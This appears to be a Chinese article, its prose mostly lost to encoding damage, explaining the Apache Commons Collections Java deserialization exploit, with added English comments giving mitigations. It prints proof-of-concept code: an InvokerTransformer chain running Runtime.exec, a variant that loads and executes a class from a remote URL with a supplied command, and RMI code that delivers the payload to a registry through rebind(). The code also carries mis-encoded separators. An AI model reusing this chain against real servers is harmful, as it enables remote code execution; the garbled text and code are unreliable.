????Map?????????????Map
????????poc?????????????????????BeforeTransformerMap?????????丳???????TransformedMap??decorate???????????Map???????key??value????transforme??
????TransformedMap.decorate????????????Map??????????????????÷????????????????????????????????Map??????????????Map???????key??????????????(???????????????????????????)?????????????Map???????value????????????????
????TransformedMap.decorate(???Map?? key?????????(??????????????null)?? value?????????(??????????????null));

?????????????????????????????????????????????poc???????Map??value?????????(???????transformer??)??
????poc?ж?BeforeTransformerMap??value???????????BeforeTransformerMap??value??????????????????????????????С?
????????з????л????????????ObjectInputStream???readObject()????????????????л???????д??readObject()?????????????з????л????Java???????????д??readObject()??????
??????????Commons Collections??????????????????л???????д??readObject()????????????readObject()?ж?Map???????????????????????????????Map???????????????????????????????
?????????????poc?п????????е????
????Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
???????????????????????????????????TSRC???????
??????????????????poc???????transformer?????????????????????InvokerTransformer??
????InvokerTransformer(String methodName, Class[] paramTypes, Object[] args)
????????????????????????????????????????? ????????????????????
// Educational excerpt (not a compilable unit): three InvokerTransformer steps
// from the page's proof of concept. Per the constructor signature the page
// quotes (methodName, paramTypes, args), each step reflectively looks up
// `methodName` with `paramTypes` on the object it receives and invokes it with
// `args`; the result becomes the input of the next step. Chained, the three
// steps reproduce the one-liner the page shows further down:
//   ((Runtime) Runtime.class.getMethod("getRuntime", null).invoke(null, null)).exec("gedit")
// Defender takeaway: the hazard is not this class on its own but letting an
// ObjectInputStream fed with untrusted bytes instantiate it. A JEP 290
// ObjectInputFilter (allow-list of expected classes, or at least a reject of
// org.apache.commons.collections.functors.*) stops the chain before any
// transformer runs; newer Commons Collections releases also refuse to
// deserialize InvokerTransformer unless
// org.apache.commons.collections.enableUnsafeSerialization is set.
// NOTE(review): the "??" sequences between arguments are mis-encoded commas
// from the page's extraction, not Java syntax.
new InvokerTransformer(
// Step 1: on the chain's input object (Runtime.class, judging by the
// equivalent call the page gives below) look up the Method "getRuntime".
"getMethod"??
new Class[]  {String.class?? Class[].class }??
new Object[] {"getRuntime"?? new Class[0] }
)??
new InvokerTransformer(
// Step 2: call Method.invoke on the result; both arguments are null because
// getRuntime is static and takes no parameters.
"invoke"??
new Class[] {Object.class?? Object[].class }??
new Object[] {null?? null }
)??
new InvokerTransformer(
// Step 3: call exec(String) on the Runtime instance — the page's harmless
// demonstration payload launches a text editor.
"exec"??
new Class[] {String.class }??
new Object[] {"gedit"}
)
????????????????????????????????????????????
????PS??????Method???invoke(Object obj, Object args[])????????壬???????????дnew Class[] {Object.class, Object[].class }??
?????????????????????????
????((Runtime)Runtime.class.getMethod("getRuntime", null).invoke(null, null)).exec("gedit");
????????????????л?transformer??
// Educational excerpt from the page's second variant of the chain. Instead of
// calling Runtime directly it builds a URLClassLoader over `url`, loads a class
// named "ErrorBaseExec" from it and calls that class's static do_exec(String)
// with `cmd` (`url` and `cmd` are defined outside this excerpt). The page's
// prose after the listing explains the motivation: the attacker-supplied jar
// carries the code instead of the serialized payload.
// Defender takeaways:
//  - The chain is still only reachable through deserialization of untrusted
//    data, so the same JEP 290 ObjectInputFilter / library-upgrade mitigations
//    apply as for the Runtime variant.
//  - This variant has an extra observable: the JVM fetches a jar from a
//    remote URL and defines a new class immediately after a readObject().
//    Outbound connections from a server process at that moment, and class
//    loading from non-local URLs, are worth alerting on; egress filtering
//    breaks the chain outright.
// NOTE(review): "Java.net" is printed with a capital J on the page and the
// "??" sequences are mis-encoded commas; neither is real Java syntax.
Transformer[] transformers = new Transformer[] {
// Step 0: seed the chain with the URLClassLoader class object.
new ConstantTransformer(Java.net.URLClassLoader.class)??
new InvokerTransformer(
// Step 1: fetch the URLClassLoader(URL[]) constructor via reflection.
"getConstructor"??
new Class[] {Class[].class}??
new Object[] {new Class[]{Java.net.URL[].class}}
)??
new InvokerTransformer(
// Step 2: Constructor.newInstance(Object[]) with a single-element URL[] built
// from `url` — this is where the remote location is introduced.
"newInstance"??
new Class[] {Object[].class}??
new Object[] { new Object[] { new Java.net.URL[] { new Java.net.URL(url) }}}
)??
new InvokerTransformer(
// Step 3: ClassLoader.loadClass("ErrorBaseExec") on the new loader — the
// class comes from the remote jar, not from the serialized stream.
"loadClass"??
new Class[] { String.class }??
new Object[] { "ErrorBaseExec" }
)??
new InvokerTransformer(
// Step 4: look up do_exec(String) on the loaded class.
"getMethod"??
new Class[]{String.class?? Class[].class}??
new Object[]{"do_exec"?? new Class[]{String.class}}
)??
new InvokerTransformer(
// Step 5: Method.invoke(null, new String[]{cmd}) — null receiver implies
// do_exec is static; cmd is the only argument.
"invoke"??
new Class[]{Object.class?? Object[].class}??
new Object[]{null?? new String[]{cmd}}
)
};
???????????????? ???????????????????????jar??????? URLClassLoader??????????????????????url????????????????????????????????????????
????????RMI????????????
????tang3?????RMI????????????????????????????????????????????poc??????
????poc????????
// Educational excerpt (not a compilable unit): the RMI delivery part of the
// page's proof of concept. `transformers`, `ip` and `port` are defined outside
// this excerpt. The sequence is: wrap the transformer chain in a map whose
// values are transformed on access, hand that map to AnnotationInvocationHandler
// (whose readObject, as the page's prose says, walks the map), wrap the handler
// in a Proxy that implements Remote, and send it to an RMI registry. The page
// describes the trigger: rebind() serializes `r`, and it is the registry
// process that deserializes it — so the chain executes on the server side.
// Defender takeaways:
//  - An RMI registry (or any RMI endpoint) that accepts objects from
//    untrusted hosts is a deserialization sink; do not expose it beyond the
//    hosts that need it.
//  - Modern JDKs apply JEP 290 serial filters to RMI as well as to plain
//    ObjectInputStream; an allow-list filter on the registry rejects the
//    Commons Collections and proxy classes used here before readObject runs.
//  - Upgrading Commons Collections to a release that disables deserialization
//    of InvokerTransformer by default removes the gadget itself.
// NOTE(review): the "??" sequences between arguments are mis-encoded commas
// from the page's extraction, not Java syntax.
Transformer transformedChain = new ChainedTransformer(transformers);
Map BeforeTransformerMap = new HashMap();
// The decorated map needs at least one entry, since the transformer is applied
// per value when the map is walked (see the page's TransformedMap.decorate
// description above).
innerMap.put("value"?? "value");
// Key transformer is null (keys untouched); the chain is the value transformer.
Map AfterTransformerMap = TransformedMap.decorate(BeforeTransformerMap?? null?? transformedChain);
// AnnotationInvocationHandler is JDK-internal with a non-public constructor,
// hence Class.forName + setAccessible(true). The first argument is an
// annotation type; the second is the map its readObject later iterates.
Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor ctor = cl.getDeclaredConstructor(Class.class?? Map.class);
ctor.setAccessible(true);
Object instance = ctor.newInstance(Target.class?? AfterTransformerMap);
InvocationHandler h = (InvocationHandler) instance;
// A Proxy implementing Remote so that the handler can be passed to rebind();
// the Proxy carries the handler (and therefore the map) in its serialized form.
Remote r = Remote.class.cast(Proxy.newProxyInstance(
Remote.class.getClassLoader()??
new Class[]{Remote.class}??
h));
try{
Registry registry = LocateRegistry.getRegistry(ip?? port);
// rebind() marshals `r` over the RMI protocol; the registry unmarshals it,
// which is the readObject() the page identifies as the trigger.
registry.rebind(""?? r); // r is remote obj
}
catch (Throwable e) {
e.printStackTrace();
}
????RMI?????poc?????????????????????????instance?????????????????????????RMI??????е????????????????????????????
???????????????instance
???????????instance ???? InvocationHandler???????h(???instance?????л?????????????instance?????????)
????????h?????Remote????? r??
????????????????????????????? registry
???????????????registry??? ???r
??????Java??RMI?У???????????????????е?jvm???????а?(rebind??????????????????)?Щ??????????RMIЭ?鴫???Щ???л?????????????????????(???????л?)??????????????????????????????????л????С?????remote???????r ???????poc???????????????remote???r?????????
????????漰RMI???????????Java?????л??????
?????????????
????Java?????л????????????????2?????????????????????к????shell???????????л??????????У???????????У???????????????????(?л??????????к??????о?????????jar????????????)????????????????а?????????jenkins??weblogic??jboss????????????ù???????????ù??????????????????????????????????